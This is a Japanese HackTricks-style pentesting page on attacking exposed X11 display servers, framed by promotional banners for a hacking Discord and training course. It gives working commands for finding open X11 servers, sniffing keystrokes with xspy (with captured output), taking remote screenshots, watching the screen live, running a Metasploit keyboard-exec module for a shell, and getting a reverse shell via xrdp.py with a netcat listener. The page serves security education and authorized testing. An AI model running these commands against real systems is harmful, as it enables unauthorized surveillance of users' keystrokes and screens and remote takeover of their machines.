ゼロからヒーローまでのAWSハッキングを学ぶ htARTE(HackTricks AWS Red Team Expert) ! HackenProof Discord サーバーに参加して、経験豊富なハッカーやバグバウンティハンターとコミュニケーションを取りましょう!
ハッキングの洞察
ハッキングのスリルとチャレンジに深く入り込むコンテンツに参加
リアルタイムハックニュース
リアルタイムのニュースと洞察を通じて、ハッキングの世界を追いかける
最新の発表
最新のバグバウンティの開始や重要なプラットフォームの更新に関する情報を入手
Discord に参加 して、今日からトップハッカーと協力を始めましょう!
基本情報
X Window System (X)は、UNIXベースのオペレーティングシステムで広く使用されている多目的ウィンドウシステムです。これは、個々のプログラムがユーザーインターフェースデザインを処理する、グラフィカル**ユーザーインターフェース(GUI)**を作成するためのフレームワークを提供します。この柔軟性により、X環境内で多様でカスタマイズ可能な体験が可能となります。
デフォルトポート: 6000
Copy PORT STATE SERVICE
6000/tcp open X11
列挙
匿名接続 をチェックします:
Copy nmap -sV --script x11-access -p < POR T > < I P >
msf> use auxiliary/scanner/x11/open_x11
ローカル列挙
ユーザーのホームフォルダにあるファイル .Xauthority
は X11の認証に使用 されます。こちら から:
Copy $ xxd ~/.Xauthority
00000000: 0100 0006 6 d61 6 e65 7063 0001 3000 124 d ............0..M
00000010: 4954 2 d4d 4147 4943 2 d43 4 f4f 4 b49 452 d IT-MAGIC-COOKIE-
00000020: 3100 108 f 52 b9 7 ea8 f041 c49b 85 d8 8 f58 1 ...R.~..A.....X
00000030: 041 d ef ...
MIT-magic-cookie-1: 128ビットのキー("cookie")を生成し、~/.Xauthority(またはXAUTHORITY環境変数が指す場所)に保存します。クライアントはそれを平文でサーバーに送信します!サーバーはこの "cookie" のコピーを持っているかどうかを確認し、持っている場合は接続を許可します。キーはDMXによって生成されます。
"cookie"を使用する には、環境変数を設定する必要があります: export XAUTHORITY=/path/to/.Xauthority
ローカル列挙セッション
Copy $ w
23:50:48 up 1 day, 10 :32, 1 user, load average: 0.29 , 6.48 , 7.12
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
user tty7 :0 13 Oct23 76 days 13 :37 2.20 s xfce4-session
接続の確認
Copy xdpyinfo -display < i p > : < displa y >
xwininfo -root -tree -display < I P > : < displa y > #Ex: xwininfo -root -tree -display 10.5.5.12:0
キーロギング
xspy を使用してキーボードのキーストロークを嗅視します。
サンプル出力:
Copy xspy 10.9.xx.xx
opened 10.9.xx.xx:0 for snoopng
swaBackSpaceCaps_Lock josephtTabcBackSpaceShift_L workShift_L 2123
qsaminusKP_Down KP_Begin KP_Down KP_Left KP_Insert TabRightLeftRightDeletebTabDownnTabKP_End KP_Right KP_Up KP_Down KP_Up KP_Up TabmtminusdBackSpacewinTab
スクリーンショットのキャプチャ
Copy xwd -root -screen -silent -display < TargetIP: 0> > screenshot.xwd
convert screenshot.xwd screenshot.png
リモートデスクトップビュー
方法: https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref
Way from: https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html
最初に、xwininfoを使用してウィンドウのIDを見つける必要があります。
Copy xwininfo -root -display 10.9.xx.xx:0
xwininfo: Window id: 0x45 (the root window) (has no name)
Absolute upper-left X: 0
Absolute upper-left Y: 0
Relative upper-left X: 0
Relative upper-left Y: 0
Width: 1024
Height: 768
Depth: 16
Visual: 0x21
Visual Class: TrueColor
Border width: 0
Class: InputOutput
Colormap: 0x20 (installed)
Bit Gravity State: ForgetGravity
Window Gravity State: NorthWestGravity
Backing Store State: NotUseful
Save Under State: no
Map State: IsViewable
Override Redirect State: no
Corners: +0+0 -0+0 -0-0 +0-0
-geometry 1024x768+0+0
XWatchwin
ライブビューイング を行うには、使用する必要があります
Copy ./xwatchwin [-v] [-u UpdateTime] DisplayName { -w windowID | WindowName } -w window Id is the one found on xwininfo
./xwatchwin 10.9 .xx.xx:0 -w 0x45
シェルを取得
Copy msf> use exploit/unix/x11/x11_keyboard_exec
他の方法:
リバースシェル: XrdpはNetcatを介してリバースシェルを取得することも可能です。次のコマンドを入力してください:
Copy ./xrdp.py \< IP: 0> –no-disp
インターフェースではRシェルオプション が表示されます。
次に、ローカルシステムでポート5555でNetcatリスナー を開始します。
その後、IPアドレスとポートをR-Shell オプションに入力し、R-shell をクリックしてシェルを取得します
参考文献
Shodan
HackenProof Discord サーバーに参加して、経験豊富なハッカーやバグバウンティハンターとコミュニケーションを取りましょう!
ハッキングの洞察
ハッキングのスリルとチャレンジに深く入り込むコンテンツに参加しましょう
リアルタイムハックニュース
リアルタイムのニュースと洞察を通じて、ハッキングの世界の速いペースについていきましょう
最新の発表
最新のバグバウンティの開始や重要なプラットフォームの更新について情報を得ましょう
Discord で私たちに参加し、今日からトップハッカーと協力を始めましょう!
**htARTE (HackTricks AWS Red Team Expert)**でAWSハッキングをゼロからヒーローまで学びましょう!